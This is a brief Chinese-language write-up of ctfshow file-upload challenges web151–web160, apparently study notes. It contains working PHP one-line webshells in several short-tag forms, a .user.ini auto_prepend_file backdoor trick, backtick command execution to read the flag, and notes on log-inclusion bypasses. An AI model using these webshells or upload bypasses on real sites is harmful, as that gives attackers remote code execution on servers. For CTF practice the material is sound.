web151
这里显示前端校验不可靠,我们直接修改前段的代码
将png改为php,然后上传我们的一句话木马
web152
这里我们前面跟上一题的前面一样,面对后端的时候,我们抓包,修改文件的类型即可
web153
这题参考ctfshow-web入门 文件上传篇部分题解_ctfshow web162-CSDN博客
我们使用user.ini绕过
写入:auto_prepend_file=1.png
然后再上传1.png,往里面插入后门代码。用蚁剑连接
web154 155
这里检测到php禁用,可以用短标签
1:<?= eval($_POST[1]);?>
2:<? eval($_POST[1]);?>
3:<% eval($_POST[1]);%>
web156
这里把[]禁用了,改为{}就行
web157-159
这里依次过滤了分号、{}、system等,直接构造命令执行
我们用反引号执行命令
<?=`tac ../flag.?hp`?>
web160
依旧先上传配置文件,发现过滤了`
这题用日志包含绕过
这里的lo.g=log=l'.'og
然后蚁剑连接